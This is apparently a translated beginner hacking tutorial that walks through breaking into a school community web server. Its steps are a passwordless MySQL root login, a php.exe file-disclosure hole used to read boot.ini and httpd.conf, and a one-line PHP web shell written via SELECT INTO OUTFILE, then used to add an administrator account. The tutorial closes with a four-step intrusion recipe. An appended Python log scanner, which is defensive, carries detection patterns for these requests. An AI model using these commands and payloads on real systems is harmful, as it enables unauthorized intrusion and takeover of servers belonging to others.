MySQL
I did a sweep with SuperScan over a Class C network segment, looking for machines with port 80 open; only one machine had it open.
I tried connecting to it: it is the home page of a community at our school.
From the banner on that port it should be Apache (Win32). Confirmed:
telnet 211.87.xxx.xxx
get (Enter)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>501 Method Not Implemented</TITLE>
</HEAD><BODY>
get to /index.html not supported.<P>
Invalid method in request get<P>
<HR>
<ADDRESS>Apache/1.3.22 Server at www.xxxxxx.com Port 80</ADDRESS>
</BODY></HTML>
Connection to host lost.
C:\>
That gives a much clearer picture. My guess: the classic "Apache + MySQL + PHP" combination.
Out of habit I ran mysql -h 211.87.xxx.xxx, and sure enough it connected:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is to server version: 3.23.53-max-nt
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
I disconnected and tried again:
mysql -h 211.87.xxx.xxx -u root -p
Password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is to server version: 3.23.53-max-nt
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
See? His root user has no password at all. That is the first point I want to make today.
Running into this situation is extremely dangerous: there is a 99.999% chance of gaining access to
Since he is running Apache + PHP, you only need to find the physical path of the web site hosted on the machine, and then you can do whatever you want.
Heh.
That leads to the next thing I want to talk about today: how do you find the physical path of the web site on the host?
There are many methods; here I will introduce two for beginners to refer to.
The first thing to tell you is that older versions of Apache + PHP have a hole:
enter http://xxx.xxxx.xxx.xxx/php/php.exe?<physical file name on the target>
and you can download that physical file.
So I entered http://211.87.xxx.xxx/php/php.exe?c:\a.txt
and it returned:
No input file specified. (Without this vulnerability the page would not be found at all.)
Well, that means he has this hole.
Then I entered http://211.87.xxx.xxx/php/php.exe?c:\boot.ini
and it returned:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\windows
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\windows="Microsoft Windows XP Professional" /fastdetect
Heh, so it is running XP.
Okay, now we can guess the physical location of his Apache configuration file.
http://211.87.xxx.xxx/php/php.exe?c:\apache\conf\httpd.conf
No input file specified.
http://211.87.xxx.xxx/php/php.exe?d:\apache\conf\httpd.conf
No input file specified.
http://211.87.xxx.xxx/php/php.exe?e:\apache\conf\httpd.conf
No input file specified.
http://211.87.xxx.xxx/php/php.exe?c:\programFiles\apache\conf\httpd.conf
No input file specified.
http://211.87.xxx.xxx/php/php.exe?f:\apache\conf\httpd.conf
Got it: this one returned a lot of output.
Here is the part we want:
# DocumentRoot: The directory out of which you will serve your
# documents. By default, all requests are taken from this directory, but
# symbolic links and aliases may be used to point to other locations.
#
DocumentRoot "D:\homepage"
So the other side's web root is D:\homepage.
What follows is easy. Want a shell already?
Don't rush; let's look at the other method first.
This one relies on a mistake in the way MySQL is used on the site.
Browse his web site and find a page that uses MySQL:
http://211.87.xxx.xxx/skonline/study/list.php?id=14
Too handsome, haha.
Submit
http://211.87.xxx.xxx/skonline/study/list.php?id=14
and it returns:
Warning: Supplied argument is not a valid MySQL result resource in
d:\homepage\skonline\study\list.php on line 231
There it is, at a glance.
Next we make ourselves a shell.
mysql -h 211.87.xxx.xxx -u root -p
Password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is to server version: 3.23.53-max-nt
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> use test;
Database changed
mysql> create table t (cmd text);
Query OK, 0 rows affected (0.08 sec)
mysql> insert into t values ('<?system($c);?>');
Query OK, 1 row affected (12.52 sec)
mysql> select * from t into outfile 'd:\\homepage\\test.php';
My shell is very simple, <?system($c);?>, under 20 characters, but it is enough
to let me execute arbitrary commands. That alone shows the power of PHP.
How do you use it?
Submit
http://211.87.xxx.xxx/test.php?c=net user kid /add
Command completed successfully
http://211.87.xxx.xxx/test.php?c=net localgroup Administrators kid /add
Command completed successfully
Heh, the test succeeded. Through!
The rest is up to you.
So it is not hard to generalize the steps of this kind of intrusion:
1. Find a host with port 3306 open and no password
2. Find the physical path of the other side's web site
3. Create a shell
4. Follow-up work
Heh, one reminder here: if you want to use or are already using MySQL,
be sure to set a strong password for root.
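As an added example (not part of the original write-up), here is a small Python script a web administrator could run over the Apache access log to spot the two request patterns the steps above rely on: php.exe queried with an absolute drive-letter path, and an OS command handed to a PHP page through a query-string parameter. The log lines, client addresses and rule names are constructed for the example; the request paths mirror the ones shown in the write-up.

```python
import re
from urllib.parse import unquote

# Constructed Apache access-log sample (not from the original page); the
# request paths mirror the patterns described in the write-up.
SAMPLE_LOG = r"""
10.0.0.5 - - [12/Mar/2003:10:01:02 +0800] "GET /skonline/study/list.php?id=14 HTTP/1.0" 200 5120
10.0.0.9 - - [12/Mar/2003:10:02:17 +0800] "GET /php/php.exe?c:\boot.ini HTTP/1.0" 200 312
10.0.0.9 - - [12/Mar/2003:10:02:40 +0800] "GET /php/php.exe?f:\apache\conf\httpd.conf HTTP/1.0" 200 34010
10.0.0.9 - - [12/Mar/2003:10:05:01 +0800] "GET /test.php?c=net%20user%20kid%20/add HTTP/1.0" 200 40
10.0.0.5 - - [12/Mar/2003:10:06:00 +0800] "GET /index.html HTTP/1.0" 200 2048
"""

# Common-log-format prefix: client, identd, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Rule 1: php.exe asked for an absolute Windows path (file disclosure probe).
PHP_EXE_PATH_RE = re.compile(r'/php\.exe\?[a-z]:[\\/]', re.I)
# Rule 2: a query-string parameter whose value starts with a shell command,
# which is how a dropped one-line web shell receives its input.
OS_CMD_RE = re.compile(r'[?&][^=&]*=(?:net|cmd|whoami|dir)\b', re.I)

RULES = [
    ("php.exe path disclosure", PHP_EXE_PATH_RE),
    ("os command in query string", OS_CMD_RE),
]


def scan_log(text):
    """Return one finding dict per log line that matches a rule."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, stamp, method, target, status = m.groups()
        decoded = unquote(target)  # %20 -> space etc. before matching
        for name, pattern in RULES:
            if pattern.search(decoded):
                findings.append({"ip": client, "time": stamp, "status": status,
                                 "rule": name, "target": decoded})
                break  # one finding per line is enough
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['time']} {f['rule']}: {f['target']}")
```

On the constructed sample the script flags the two php.exe probes and the command sent to test.php, and ignores the normal list.php and index.html requests.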